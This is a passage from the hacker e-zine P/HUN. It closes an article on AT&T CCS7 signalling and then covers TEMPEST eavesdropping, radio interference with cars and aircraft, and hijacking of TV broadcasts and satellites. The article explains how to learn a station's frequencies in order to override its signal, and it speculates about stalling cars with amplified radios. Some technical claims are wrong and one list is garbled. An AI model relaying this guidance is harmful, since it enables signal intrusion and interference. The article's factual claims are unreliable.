  3987. digital services.
  3988.  
  3989.            Evolution of NCP Serices to a Distibuted Architecture
  3990.            DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  3991. The increasingly demanding requirements of call processing services such as the
  3992. AT&T card service, advanced 800 and software defined network (ISDN) have led to
  3993. a steady evolution of the NCP architecture toward more distribution. This is to
  3994. increase versatility of the usage, flexibity of growth and performance. At the
  3995. same time we will be able to introduce more new services. The orgianl NCPs
  3996. introduced in 1980 consisted of AT&T 3B20 duplex processors and multiple disk
  3997. drives. The 3B20D handled all the fucntions including query processing database
  3998. admnistration and updates and signaling. The first step toward a distriuted
  3999. NCP architecture was in the signalling architecture. In 1985 the NCP
  4000. incorporated a highly reliable processor interconnect capability(PIC) with the
  4001. same technology used in the 2STPs. It provides communication between the CCS
  4002. network and the NCP application databases in the 3B20D host Signalling links
  4003. from the STPs to an NCP terminate through link nodes(LNs) on the PIC.The CCS
  4004. query messages could access an NCP through the LNs and travel to the
  4005. appropriate database application in the 3B20D. Similarly query responses
  4006. destined to the CCS network could exit from the NCP through the PIC and the LNs
  4007. The future NCP architecture will continue to serve host to the NCP distributed
  4008. enviroment and the PIC will remain the vehical for the interprocess
  4009. communication and signaling-link termination. To attain distributed query
  4010. processing, the NCP database architecture will feature the intergration of
  4011. multiple transaction-processing components.
  4012.  
  4013.                         CCS7 Network Interconnection
  4014.                         DDDDDDDDDDDDDDDDDDDDDDDDDDDD
  4015. With the potential for end to end signalling services and the adoption of CCS7
  4016. standards, there is a growing effort to connect networks of different carriers
  4017. and different countries as well as various privately owned networks. It is
  4018. expected that in the future all North American networks will have CCS7.
  4019. Therefore AT&T is  currently involved in defining standard CCS7 interface for
  4020. use between netwroks. Initially, the new interface will consist of 2STPs
  4021. deployed in pairs.This network configuration assumes that interconnecting will
  4022. use designated STPs as gateways. The gateway STPs will be required to screen
  4023. all incoming message to prevent unauthorized use of network resources and
  4024. services :-)
  4025.  
  4026. Interconnecting networks using designated STPs as gateways.
  4027.  
  4028.  
  4029.                         Network
  4030.                         boundary
  4031.  Network 1 (AT&T)          |     Network 2
  4032.  _____           ______    |   _______
  4033.  |X  |          |X   | |   |  |X   | |
  4034.  | X |----------| X  | |___|__| X  | |
  4035.  |__X|          |__X_|_|   |  |__X_|_|X
  4036.    |  X            |       |      |    X
  4037.    |   X           |       |      |   SPC Switch
  4038.    |    X        __|___    |      |    /
  4039.    |     X______|X   | |   |   ___|___/
  4040.    |       _____| X  | |___|__|X   | |
  4041.    |______|     |__X_|_|   |  | X  | |
  4042.                 Gateway    |  |__X_|_|
  4043.          2STP mated pair   |  Gateway STP
  4044.                            |   mated pair
  4045.                            |
  4046.  
  4047. The figure below shows interconnection of a small network that does not have
  4048. STP gateway.
  4049.                   Network
  4050.                   boundary
  4051. Small network 3      |     AT&T CCS7 netowrk
  4052.                      |
  4053.                ______|_________%%%%
  4054.               /      |         %%%%
  4055.              /       |
  4056.   +++++++++ /        |
  4057.   +  SPC  +/         |
  4058.   +switch +X         |
  4059.   +++++++++ X        |
  4060.              X       |         2STP mated pair
  4061.               X______|_________%%%%
  4062.                      |         %%%%
  4063.  
  4064. The same arrangement that is being used domestically is currenlty being inves-
  4065. tigated for application to the CCITT No. 7 message transfer part/telephone
  4066. user part (MTP/TUP) international network interconnection. However because of
  4067. differences between national networks, international interconnection is more
  4068. complex. With the implementation of ISDN-UP for international signalling in
  4069. early 1990s, it is expected that many of the existing domestic services will
  4070. be extended to embrace the international networks as well.
  4071.  
  4072.                      CCS7 Support for ISDN Services
  4073.                      DDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  4074. Common Channel Signalling was designed for signalling between network entities.
  4075. ISDN protocols are designed for out of band signalling all the way to the end
  4076. user.Much of the current effort in ISDN is in defining protocols and
  4077. architectures for providing the out of band signalling from the end user
  4078. premises to the network.However to provide end to end service the network has
  4079. to transport the end user's out of band signalling, using CCS or other means.
  4080. An important benifit of CCS7 is its inherent ability to support feature
  4081. transperancy i.e., allowing of passing of information that can only be
  4082. interpreted and used by end users.This capability can be attained by
  4083. interworking the ISDN Q.931 protocol with the CCS7 ISDN-UP and extending ISDN
  4084. to switched access users through network interconnection.
  4085. Methods of supporting CCS7 features transparency include:
  4086.  
  4087. o Message-associated user to user information
  4088. o Temporary and permanent signalling connections.Message associated user to
  4089.   user information could pass along with regualar CCS7 call control messages
  4090.   as opposed to using signaling connections specifically established for that
  4091.   purpose. The transfer of transparent inoformation would generally be done
  4092.   after the signalling connection (temporary or permanant) is established but
  4093.   message associted transparent information could be transfered during the
  4094.   establishment and/or termination phases of the signaling connection.
  4095.  
  4096. Both AT&T and the regional BOCs are deploying ISDN signalling in their networks
  4097. Once in place, ISDN offers capabilities such as
  4098.  
  4099. o Per-cali selsction of services and bandwidth
  4100. o Combined voice,data and even video on a single call
  4101. o Calling-number identification at the terminating end (for example, a digital
  4102.   display for the calling number during ringing)
  4103. o Sophisticated multimedia teleconferencing capabilities
  4104.  
  4105. Futhermore ISDN will be able to make it possible to add new features and
  4106. improve the implementation of the exsisting services such as support packet
  4107. transmission and separation of the call/control from user control information
  4108. in ISDN.
  4109.  
  4110.                    Potential CCS7 Network Enhancements
  4111.                    DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
  4112. The future CCS network will probably be configured as follows:
  4113.  
  4114. 1) The ISDN-UP will be used throughout North America.As local carriers adopt
  4115.    CCS7 network interconnect will provide for end to end digital services. The
  4116.    signalling connection control part (SCCP) will be used to provide data
  4117.    capability for ISDN user to user information.
  4118. 2) The CCITT No. 7 protocol will be used internationally.First the telephone
  4119.    user part (TUP) will provide basic call setup to countries that chose to use
  4120.    this protocol initially. However because of its increased flexibility and
  4121.    support for digital services, the ISDN-UP will be used to extend domestic
  4122.    ISDN services worldwide.
  4123. 3) The interconnection with local exchnage carriers as they expand their own
  4124.    CCS systems will enhance LATA access services and allow new inter-LATA
  4125.    service.
  4126. 4) AT&T services will evolve as the flexibility and capacity of the CCS7 of the
  4127.    protocol is utilized.The transaction capability and part (TCAP) will provide
  4128.    an effecient protocol for direct-signalling query and responses, to support
  4129.    new databases and switch-based services.
  4130.    The interworking of CCS7 with the Q.931 ISDN access protocol will allow end
  4131.    to end services that are not possible with in-band signalling and will
  4132.    provide more effective and innovative use of work.
  4133.  
  4134.                                   Conclusion
  4135.                                   DDDDDDDDDD
  4136. The evolution os the AT&T common channel signalling system has been shown to be
  4137. a critical part of the AT&T network and services. It has provided a cost
  4138. effective means of providing flexibility in the marketplace. The system
  4139. is expected to evolve as new capabilities and need are indentified.
  4140.  
  4141. Tubular Phreak NUA!
  4142.  
  4143.  
  4144. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4145. =                   P/HUN Issue #3, Volume 2: Phile #8 of 11                  =
  4146. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  4147.  
  4148.                              WHO'S LISTENING
  4149.                              ---------------
  4150.                               By  Capt. Zap
  4151.  
  4152.  
  4153. Over the years, there has been a number of different studies and
  4154. discoveries that would alter personal and electronic security over
  4155. time. Devices able to "listen" to almost any form of communications
  4156. have become commonplace and are available "over the counter" from a
  4157. varied number of sources. Such units range from ten to fifteen dollars
  4158. to expensive set-ups that employ microwaves and lasers for the
  4159. interception of almost any audio signal in the spectrum. But now with
  4160. somewhat needed protection from outsiders in reference to this
  4161. problem, a number of solutions have been put in place and global
  4162. protection is insured in environments that have such need. But the
  4163. coverage of environment has had a a major change in protective attention
  4164. now being place on the actual electronic emmanations that are so common
  4165. with todays standard electronic apparatus. Electronic telephones,
  4166. computers and communications networks, ATM's, radio and television
  4167. stations are just part of the overall electronic bubble that we have
  4168. placed our society into with the hopes of providing better and faster
  4169. methods to make daily life a bit easier. But with such a fragile structure
  4170. as the electronic bubble, we have new opportunities to discover secrets
  4171. never before possible due to the lack of technology. The same technology
  4172. that helps us in one way or another may also be helping others
  4173. unbeknownist to those who are protecting the environment in the first
  4174. place. Signal leakage, either by design or by accident may lead to total
  4175. collapse of protective measures due to "wide open spaces" in the
  4176. protective sphere. In this particular paper, we will discuss the possible
  4177. problems of common office technology may bring in un-securing your
  4178. installation.
  4179.  
  4180.  Our main focus will be in the areas concerning with the emmanations
  4181. or transmissions of "Tempest" frequencies. "Tempest", is the code name
  4182. given to a specfic area concerned with radio frequencies radiated by
  4183. computing equipment by the U.S. Dept. of Defense. This "concern" from
  4184. such equipment dates back to the late 50's. The concern ranged from the
  4185. possible interception of "informational information" by sources other
  4186. than the intended users of such. The problem is more easily reconigized
  4187. by the current requirement of normal electronic equipment having to
  4188. conform to emmision standards put forth by the Federal Communications
  4189. Commission in reference to the amount of electronic "noise" generated
  4190. by common standard technology so that such signals do not interfer
  4191. with other such pieces of equipment or their operations.
  4192.  
  4193. To describe in simple terms, Tempest frequencies are almost straight
  4194. through from commerical AM stations to the upper reaches of 600 Mhz.
  4195. They are generated or transmitted by any number of different common
  4196. daily life electrical and electronic systems. Your TV puts out one
  4197. frequency, the stereo another, the common electronic telephone,
  4198. cordless phones still another, the microwave oven puts out another and
  4199. the wireless alarm does it to, and story goes on. So just as all of these
  4200. pieces of equipment emmit a signal, so does the personal computer.
  4201.  
  4202.  
  4203.  
  4204. We will describe two possible examples of such informational information
  4205. and the abilty for some with directed intent to cause potentially fatal
  4206. results due to the use of directed "noise". It should be noted that
  4207. the current specifications for "Tempest" approved systems is considered
  4208. classified by the DOD and these specs were not available to the author.
  4209. But if one was to look at the specs for normal computing equipment
  4210. and reduce the allowed emmission output by at least 50 percent, that
  4211. may be a realistic emmission standard accepted by the DOD.
  4212.  
  4213.  
  4214. Example 1
  4215.  
  4216. "We had better "Czech" this out!
  4217.  -------------------------------
  4218. In 1987, a very strange occurence concerning forgein nationals from
  4219. an Eastern bloc nation entered this country in a large camper-like
  4220. truck via the border checkpoint at Niagra Falls, New York.
  4221. The visitors numbering 4 or 5, were in the country under tourist visa's
  4222. and were reported to be representives of the countries automobile and
  4223. truck industries here on a promotional tour to garnner interest in their
  4224. exportable products. The one problem with the "visitors" is that none of
  4225. them had any connection with such industries in their home country.
  4226. In fact, the visitors were far from what they supposedly represented.
  4227. The group descripton read like a Whos' Who of mid-level management of
  4228. Eastern bloc intelligence operations. The group reportedly consisted of
  4229. a nuclear physists, a specialist in aerial map-making complete with a
  4230. small ultra-light powered aircraft, a communications and computer expert
  4231. and two communist party officals.
  4232.  
  4233. Over a 5 month period, the group was reported to have visited 17 states
  4234. looking at 40 to 48 sites dealing with military and defense contractor
  4235. sites. The vehicle and its occupants were reportedly followed by over
  4236. 100 agents of the FBI, NSA, Secret Service and State department and at
  4237. least one over flight of a military reservation was reported. Even though
  4238. the overflown site was not identified, one site was. This site, was the
  4239. "sensitive" naval communications center for the Pacific Fleet located
  4240. in San Diego. It was reported that the truck and it's occupants were
  4241. parked a few hundred yards from the facility for several days and
  4242. according to law, were in no violation of any current statute at the
  4243. time. The group was also at or around at the 2800 acre North Island
  4244. Naval Air Station based in Coronado, California. The spokesman for the
  4245. base stated that you could not see much of anything going on except for
  4246. the take-off and landing of aircraft which you could see from almost
  4247. any place.
  4248.  
  4249. Common sense states that you do not have to be inside the facility in
  4250. either a physical or electronic standpoint to collect information. You
  4251. can park in any lot or street close enough to your supposed target and
  4252. stick up your antennas. No property violations, no photo restrictions to
  4253. comply with, no restrictions at all because you are sitting in a public
  4254. place, parked or having coffee with your "ears" on. A good example of
  4255. such parking was reported in a paper published in Computers and
  4256. Security 4, titled Electromagnetic Radiation from Video Display Units:
  4257. An Eavesdropping Risk? by William Van Eck, copyright 1985. He stated
  4258. that when they were conducting their experiments in the open on public
  4259. roadways, with a van and antenna system that was quite noticable,
  4260. no one asked what they were doing or had any thought about the time
  4261. spent doing such things.
  4262.  
  4263. The end of this particular story is as follows: At the end of the suspect
  4264. journey, the truck was searched at the Nosgales, AZ border checkpoint and
  4265. was then released. Nothing considered illegal was found in the search
  4266. and the truck and it's passengers were released and entered Mexico.
  4267. Now even though the truck was suspected of performing passive
  4268. "eavesdropping" operations, the federal goverment had no legal right to
  4269. hold either the truck or crew. And the possible intercepted information was
  4270. then released from the country. It should be noted that the truck could
  4271. have a number of standard "off the shelf" items. These items could
  4272. have consisted of 2 general coverage radios with a combined tuning range
  4273. between 100 Khz to 2 Ghz., an IBM personal computer clone, various
  4274. cheap video and signal enhancment equipment, printers and modems,
  4275. and other such complement devices.
  4276.  
  4277. None of the equipment would be any "James Bond" type of gear and the
  4278. basic suspected set-up would cost the operation less than 10,000 dollars
  4279. if budgeted correctly. And if possible, use of other simple off the shelf
  4280. type radios like the 200.00unit available from Radio Shack that covers
  4281. 150 Khz to 30 Mhz is not at all unheard of due to some budget constraints.
  4282. And since most emmanated signals generated by logical devices are within
  4283. commerical AM and FM frequencies, the use of a standard auto radio antenna
  4284. would suffice to use as a pickup.
  4285.  
  4286. So the major concern with such actions comes from the ability of simple
  4287. equipment to detect, register and decipher such emmanations with relative
  4288. ease. The ability of such persons and possible actions able to penitrate
  4289. the electronic fog of our society should be a clear distinct warning to
  4290. those concerned with security in general.
  4291.  
  4292. In addition to all of the above, the author contacted various federal
  4293. goverment agencies in reference to this information and was told that
  4294. they had no knowledge of such an investigation and could not tell where
  4295. such supposed counter-intelligence operations were controlled from or who
  4296. to contact in reference to supplying such information. Current "Freedom
  4297. of Information Act" requests for information concerning this supposed
  4298. federal project are underway.
  4299.  
  4300. An interesting note about filing the forms for access to information
  4301. about the Czech incident is described to give guidance to others who
  4302. may wish to investigate this incident and seek help from such elected
  4303. officals.
  4304.  
  4305. When the papers were filed for the desemenation of information
  4306. through the Freedom of Information Act, members of the U.S. Senate and
  4307. Congress were contacted in reference to this matter. The first contact
  4308. was placed through Senator Arlen Spectors office in Philadelphia, Pa.
  4309. We were first rebuffed by persons who refused to identify themselves
  4310. with the statement " I am sorry, but that information is covered by
  4311. the 1974 Privacy Act, Click! Well we called back and informed the
  4312. person who answered the call of the situation and then were re-connected
  4313. and informed them that Czech citizens were not covered by US privacy
  4314. laws and that there was no invasion of privacy.
  4315.  
  4316. They called the FBI and asked if they were the way such things were
  4317. handled, and were told yes or no. But they had no answer for any question
  4318. put forward and said " They were sorry!", but we don't know how to help
  4319. you!. Our second contact to Senator Spectors office in Philadelphia as
  4320. in essance like the first, they would not assist nor would explain why
  4321. they took this position in the first pace. During our second contact
  4322. we spoke to a Miss or Mrs. Anderson. She stated that such requests
  4323. were not in the senator's perview and they could not assist in this
  4324. matter. When asked why it as not in the senators preview, we were
  4325. informed that they do not have to give a response. When asked for an
  4326. offical response, we were informed that no offical response would be
  4327. given. But as a side note, Senator Hienz office said that they would
  4328. forward the requests to Spectors office in Washington. One other
  4329. thought on this matter: I am sure that if the good senator wants to get
  4330. some information, his staff jumps through hoops to get him all he wants
  4331. and then some! A pre-publish copy of this article will be delivered so
  4332. that even he (or his office staff, who were of no help at all due to a
  4333. tough question placed to them by a citizen) may learn of what may be
  4334. going on in his own country. So much for gaining assitance from a senator
  4335. who sits on a judical panel. We visited next the office of John Hienz.
  4336.  
  4337. Again, funny looks about the Freedom of Information Act and they hemmed
  4338. and hawed at the questions presented. They took the requests and said they
  4339. would try and see what could be done. Our final visit was to our local
  4340. congressman, Tom Foglietta, whos office still stated the 1974 Privacy law,
  4341. but took the requests when presented in person. It pays to visit your
  4342. elected representives working areas. So much to do (if you work there!)
  4343. in a goverment office. Other federal agencies including the FBI were most
  4344. helpful in complying with the requests. Of course we found this most
  4345. interesting. Is it so they could possibly reclassify the information to
  4346. a "Secret" status instead of what it may be now.
  4347.  
  4348. Other agencies contacted in reference to FOIA requests include the CIA,
  4349. NSA, NRO, Customs, State Dept., Army Automated Intelligence and Military
  4350. Police, FBI, FCC .
  4351.  
  4352.  
  4353. Example 2
  4354.  
  4355. "Breaker, Breaker, Wally Gator!"
  4356.  -----------------------------
  4357. During the 70's, the United States had a short term love affair with
  4358. the Citizens Band radio. What were once clean channels were suddenly
  4359. crammed with persons who wanted to be able to communicate with any
  4360. number of persons who also had such capabilities. Suddenly, everyone
  4361. had one of these radios in the home or car and some were know to have
  4362. both. Numerous persons ran such rigs with varing illegal applications
  4363. ranging from a lack of license to the intense over powering of such
  4364. stations.
  4365.  
  4366. To give a brief explanation of CB's, we will keep it simple. CB's
  4367. transmit in the upper reaches of 26 Mhz to 27 Mhz or 11 meters band.
  4368. CB's are allowed to operate with a maximum output of 5 watts radiated
  4369. power. Of course this limited power was not sufficent for some users and
  4370. the use of linear amplifiers or "heat" was commonplace. Stations were
  4371. known to be transmitting 50 to 2 thousand watts to their antennas which
  4372. in turn would increase such signals to a power of over 2 hundred thousand
  4373. watts. Some operators were known to show the intense power outputs with
  4374. the use of flourescent lightbulbs and the abilty to "light" these tubes
  4375. from a distance without electrical connections with the amplified radiated
  4376. power of their antennas.
  4377.  
  4378. Some persons were known to have full control of channels in their
  4379. respective areas and would blank out anyone who would not conform to
  4380. the channels establised rules or procedures. Others set-up pirate
  4381. stations that would broadcast commerical music for all to hear
  4382. complete with news, weather and sports. Such actions would tie up
  4383. frequencies and caused a general crackdown by the FCC in the later
  4384. years. But the problem still continues and the FCC has all but given
  4385. up on the idea of any enforcement of regulations concerning such
  4386. operations on the 11 meter or 27 Mhz band.
  4387.  
  4388. The craze of CB's left the general populace by the late 70's and was
  4389. back in the hands of those who would truely use such radios. Those who
  4390. would use such radios best known, would be the persons called truckers
  4391. since that is what they do. They "truck" goods from one place to
  4392. another and are concerned with time and travel conditions as most of
  4393. us are. The truckers always had some "heat" on-board for those times
  4394. when they could not get their signal "out". It was and still is
  4395. considered an insurance policy by most who have this technology and is
  4396. widespread in its use.
  4397.  
  4398. Now over time, with the continued expansion of these radios, the
  4399. truckers began to switch to marine band radios in the 10 meter band
  4400. and were conversing just as before. Since the 10 meter band would
  4401. permit such radios and the increased power output, the switch to 10
  4402. meters was only a matter of time. Now, it is reported that most
  4403. truckers are using and abusing such frequencies and their is little
  4404. that can be done to stop such occurances from happening. To add to all
  4405. of the mess, such radios have the ability to switch operating frequencies
  4406. with the touch of a button. In brief, the 10 meter radios can switch to
  4407. the 11 meter (CB) band with minor modifcations. And back and forth
  4408. frequency hopping is as easy as tuning in the average auto radio.
  4409.  
  4410. One other interesting aspect of these 10 and 11 meter radios and their
  4411. use of 10 meter amplifiers, is the problem of interference generated
  4412. by the amplifiers due to the lack RF chokes and filters for the simple
  4413. reason that the unit is designed for use on the 10, meter band, not
  4414. the 11 meter band and thats what the chokes and filters look for, 10
  4415. meters, nothing more, nothing less!
  4416.  
  4417. Enter the common travelling person with a late model vehicle. Most
  4418. vehicles today have some form of directed artifical intelliengence
  4419. working under the hood. The "brain" controls any number of common
  4420. operations ranging from air / fuel mixtures to how and when braking
  4421. systems will perform. Microprocessors in todays cars are as common as
  4422. seatbelts and are now required to assist in normal operations of said
  4423. vehicles. And this is where the problem begins. Since the auto must
  4424. have such control circuitry to function, then the possible interference
  4425. of such operations becomes a real threat. But what sort of threat
  4426. could be possible with a car, its control systems and a high powered
  4427. transmitting radio? Well, if one was to examine the idea of overriding
  4428. or shuting down said operations, the car would cease to function in any
  4429. proper manner. Such a shutdown could very easily cause fatal accidents
  4430. and the cause would be un-known due to all "looking" fine in any
  4431. aftermath examination.
  4432.  
  4433.  Now we add to the scene, your common average trucker with such a radio
  4434. in his poccession and the ability to transmit high powered signals as
  4435. one chosses. One example of such high power hijinks would be the
  4436. specfic targeting of autos on the highway with a points / scoring
  4437. system based on performance, price, make and if the car was built in
  4438. the U.S. or not. What would be the outcome? To answer, it would be the
  4439. shutdown of of the cars electronic logical systems causing other systems
  4440. on-board to do likewise in successive order. How can this come about?
  4441. Well the answer is quite clear, the high powered signal causes the logical
  4442. centers to conflict or ignore basic operational commands from the
  4443. microprocessor in turn causing the microprocessor to close down, then
  4444. cause a halt to basic actions and the car stops running.
  4445.  
  4446. Other known occuring incidents that have had some humerous and fatal
  4447. results have been reported in the past years by the press. Examples
  4448. are:
  4449.  
  4450. 1. As early as the mid-seventies, Volkswagen developed a computer
  4451. controlled fuel injection valve control system. The car worked perfectly
  4452. in Europe, but had some unexplained engine failures in the united
  4453. states. The problem of engine failure was intermintent and very short
  4454. lived when happening. The alleged cause of such failures were the
  4455. transmission of Citizens Band radio frequencies from either mobile or
  4456. base stations near by and causing an induced current sufficent to
  4457. cause a malfuncition.
  4458.  
  4459. of two meter radios and the electronic control systems. Other cars are
  4460. reported to have some problems with cellular phones. Reports from
  4461. England even indicate such problems occuring in a wide spectrum of
  4462. autos in the area around Daventry due to RFI from the transmitter used
  4463. by Radio Four, a commerical station transmitting on 1500 meters along
  4464. with local AM and FM broadcasts. It seems that the station base was using
  4465. a very high wattage transmitter and that when the transmitter was
  4466. transmitting, the cars that passed close to the station would sometimes
  4467. shutdown the engine causing minor overall problems and some angry
  4468. motorists. If you look at this problem, you may see possible small
  4469. scale urban electronic warfare possibilities. Two such areas might
  4470. include the use of directed radio energy against late model autos by
  4471. law enforcement or worse, by terroristic factions seeking to do the
  4472. same thing. And one more example of such reports concern the sudden
  4473. acceleration problems with some imported cars in the U.S. An interesting
  4474. point to mention is that HONDA is offering owners of the 1988 Civic a
  4475. replacement chip because of such reported problems.
  4476.  
  4477. 3. On the lighter side of the problem, it was reported in the November
  4478. 24th, 1987 edition of the Baltimore Sun, that some residents of
  4479. Frederick, MD were having problems with the use of their electronic
  4480. garage door openers. Owners of such devices returned them to places
  4481. of purchase and found that the units worked perfectly. It was noted
  4482. that nearby, the U.S. Army operates a major communications center for
  4483. both domestic and international traffic. An Army spokesman stated that
  4484. they are not radiating anything that should lock up the garage door
  4485. recievers. It is also reported that when the Army turned off certain
  4486. transmitters, the garage door openers would work again. While the Army
  4487. stated that they were not the problem, the "problem" did disappear as
  4488. stated by the Army. You be the judge on this!
  4489.  
  4490. On the fatal side of this problem, incidents were more deadly than funny.
  4491. Although the cause of such incidents was all not due to an "Alligator"
  4492. radio, but it was caused by the same type of over poowered raidiated radio
  4493. emmissions. The cause was high wattage again and was to effect a new type
  4494. of attack helicopter in use by 2 different U.S. armed services.
  4495. The helicopter, known as the AH-64, Blackhawk or the naval version named
  4496. Seahawk is considered, operational state of the art in low level air
  4497. combat situations and is highly electronic in its basic make-up and
  4498. operations. The problem was two fold in nature and both were to contribute
  4499. in the final discovery.
  4500.  
  4501. The first cause was due to the need of the design to employ a unique
  4502. horizontal stabilizer to help the helicopter improve it fly-ability.
  4503. The stabilizer was controlled through a series of electronically
  4504. activated hydraulic systems run through a microprocessor that in turn was
  4505. controlled from the cockpit through a series of other logical and
  4506. electronic relay systems. There was no physical connection between the
  4507. crafts flight controls and the pilot of the craft. What is meant, is that
  4508. the fly by wire method was replaced by a set of relays and hydralic
  4509. attenuators instead of cables and pulleys. It may not a been as smooth as
  4510. the electronic flight, but it took an explosive charge to bring the
  4511. control to a dead stick and at the same time could be fixed with a pair
  4512. of wire cutters and clamps instead of a soldering iron and electronic
  4513. parts.
  4514.  
  4515. The second problem, being more unknown and deadly, consisted of radio
  4516. frequency interferance stemming from a number of different sources.
  4517. One such source was found as a common citizens band radio with major
  4518. illegal power output. Another incident of the same type of nature was
  4519. discovered when one of the helicopters flew to close to a commerical
  4520. radio stations transmissions towers. Both times the flight ended in
  4521. fatalities for the crews. It was discovered that strong radio was the
  4522. cause. According to published reports, 5 UH-60 Blackhawks have
  4523. nosedived into the ground killing 22 serviceman since 1982. And the
  4524. U.S. Army instructed it's pilots that flights near microwave antennas
  4525. or shipboard radar may cause "uncommanded" altitude changes. In English,
  4526. it translates to crashing into the ground at 600 miles per hour!
  4527. So, this basic simple problem was not thought of as one that was possible
  4528. even with the current concerns of systems management in the now fully
  4529. electronicisied battlefield.
  4530.  
  4531. So, the first problem was that the controls of the craft are being
  4532. directed by impulses instead of physical controls. The second was the
  4533. use of un-protected electronics from both background and now, potential
  4534. directed uses of radio frequency energy as weapons of warfare or even
  4535. better, as stated before limited urban actions.
  4536.  
  4537. So now we take the approach of normal radio environment and place an
  4538. active thought to possible options no available to a direct force.
  4539. If reports of these natures are known to the general public, then what
  4540. is to stop the directed force from becomming a new invisible tactic
  4541. that can cause major disruptions of computer / communications systems
  4542. currently in use.
  4543.  
  4544. Lets take the current state of electronic protective measure in force
  4545. and used by the different defense agencies throughout the country.
  4546. First off, we have the problem of large Electro-Magnetic Pulses, (EMP's)
  4547. being able to disrupt command and communications links with the use of
  4548. one nuclear device detoneated at a unknown range above the continential
  4549. united states.
  4550.  
  4551. Another example comes from outside theoretical research concerning the
  4552. SDI programs. One thought, from Thedore B. Taylor, a retired nuclear
  4553. weapons designer and father of the largest yield fission bomb, the
  4554. S.O.B., was quoted in an interview published in September, 1987.
  4555. He stated that if you explode a one-kiloton device in space and directed
  4556. the energy into a 3 centimeter beam of radiation, you could deposit
  4557. enough energy to wipe out electronic and electrical equipment - computers,
  4558. antennas, power lines, over an area larger that Washington, D.C. He was
  4559. also quoted as saying that microwave weapons are more than likely being
  4560. developed too.
  4561.  
  4562. Now weapons of this nature are on a very large scale and require vast
  4563. amounts of energy too start with. But in a directed small beam aimed at
  4564. normal general construction type buildings, a directed beam of energy cuts
  4565. through walls, doors, and windows as if they were not even there.
  4566. Your example is some of the local television or radio stations in your
  4567. area. If you look at all or most of the stations, you might find a small
  4568. shack atop of their building. It may contain the microwave dishes for the
  4569. studio to transmitter links. The glass and wood are nothing to the
  4570. in-comming or out-going signals. Brick walls mean nothing to a radio
  4571. signal either. Just tune in your desk radio and listen to your
  4572. favorite station.
  4573.  
  4574. So this pulse would be able to short out almost all commerical electrical,
  4575. telecommunications, computer operations, and any other devices that
  4576. contain transistors or semiconductors for a circuit path. These basic
  4577. examples show what such types damage that these emmisionns may pose.
  4578.  
  4579. The second part of this problem is with the protection of such circutry.
  4580. Great amounts of technology protection comes in the form of deep trenches,
  4581. standard and special grounding of buildings and equipment, cable and
  4582. support runways, and concrete encasements. Now this is all wonderful and
  4583. good from a military viewpoint where money is no object, but in the real
  4584. world, the use of such protective measures is not possible even for the
  4585. most prestigieous of corporations.
  4586.  
  4587. Now if such large pulses can destroy equipment on a global scale. Then the
  4588. idea of using such forces becomes a better local tool for the destruction
  4589. of security and measures taken to protect such devices and facilities from
  4590. a physical standpoint.
  4591.  
  4592. Ok now we know that the possibility of directed energy may be used to
  4593. disrupt the communications and operations of logical devices. There
  4594. are numerous ways to use such technology to gather and alter electronic
  4595. impulses. Another group of examples comes closer to the common man and
  4596. is happening all to frequently to the owner / operators of mass
  4597. communications systems. Best know, is the interruption of signals from
  4598. a Home Box Office satellite and the insertion of a message that stated
  4599. its subscripton rate was to high. That one incident struck fear in the
  4600. hearts of the communications industry and showed that anything was
  4601. fair game.
  4602.  
  4603. Other actions placed against commerical stations include the interception
  4604. and signal override of 2 television stations in the Chicago area. One such
  4605. action was placed against a Public Broadcasting station and the other was
  4606. directed to one of the "Super Stations" in the same area. The first pirate
  4607. transmission lasted 15 seconds and the second, two hours later, lasted 90
  4608. seconds. The Pirate, dressed in a Max Headroom facemask, uttered some
  4609. statement, although garbled and during the second incident, bent over and
  4610. exposed his / her rear and was struck on the behind with a fly swatter to
  4611. the shock of the viewers. Of course the FBI and FCC were called in to
  4612. investigate, but investigations of this sort led to nothing more than an
  4613. empty trail.
  4614.  
  4615. Now to perform such deeds, one would have to contact either the station or
  4616. the local office of the FCC to find out what the transmit and studio to
  4617. transmitter frequencies are. (And this goes for any transmitter registered
  4618. with the FCC. They will supply the name and location, frequency, and the
  4619. maximum legal output of such sites.) There are two frequencies used for
  4620. each television channel. One for the Audio and the other for the Video, or
  4621. the other option, to listen or watch the station until it sign's off for
  4622. the day (night). This one method does not lead to possible discovery and
  4623. the frequencies are given at sign-on and sign-off. A good example of such
  4624. frequencies is with a station located in Philadelphia, Pa. The station,
  4625. WPVI, transmits its audio signal on commerical FM frequencies.
  4626. The frequency is 87.8 Mhz. Now anyone with a good transmitter could add
  4627. anything to the signal and no one would be the wiser until they did.
  4628.  
  4629. Examples of such transmitters and persons capable of doing this type of
  4630. transmission is best described by the incident in the summer of 1987
  4631. concerning Radio New York. This radio station was considered a "pirate"
  4632. station and the federal goverment decided to move in and shut them down.
  4633. An interesting note to all of this, was that the station was located on a
  4634. ship anchored off the coast of New York outside US boundarys. Still the US
  4635. goverment with agents of the FBI, FCC, Customs and the Coast Guard boarded
  4636. the vessel, closed down the station, arrested the persons on-board and the
  4637. ship was taken in tow. End of that particular story.
  4638.  
  4639. On the other hand, two other stories of interest deal with the possible
  4640. and real way some may be able to jam or possibly damage state of the art
  4641. satellite communications. The first dealt with a group who call themselves
  4642. the American Technocratic Association based in Wilmington, Delaware.
  4643. This groups thought revolve around the scrambeling issue in use by the
  4644. pay TV companies. The background of the members of this group claim to
  4645. have a good working knowwledge of military radar communications systems.
  4646. The group claims to have the capability to jam a satellite with a few
  4647. mobile systems it has. One operation that the group hopes to undertake
  4648. was called "Operation Sunspot". The group claims to have areas mapped
  4649. out that have no treaty, regulation or statute dealing with the jamming
  4650. of a geo-stationary satellite. The one problem with all of this is that
  4651. such a thing could happen very easily. Now there are some who say that
  4652. such things could not happen, but if one is to look in a number of
  4653. magazines for such information on frequencies or locations, you could
  4654. find it.
  4655.  
  4656. So you say to yourself that you want to try this experiment. Well we
  4657. will not supply exact details of such techniques, but will say that
  4658. HAM radio operators have the ability to contact both American and
  4659. Soviet repeater satellites and if you wanted to you could do the same
  4660. thing. Now for your basic uplink to such systems, you would need a
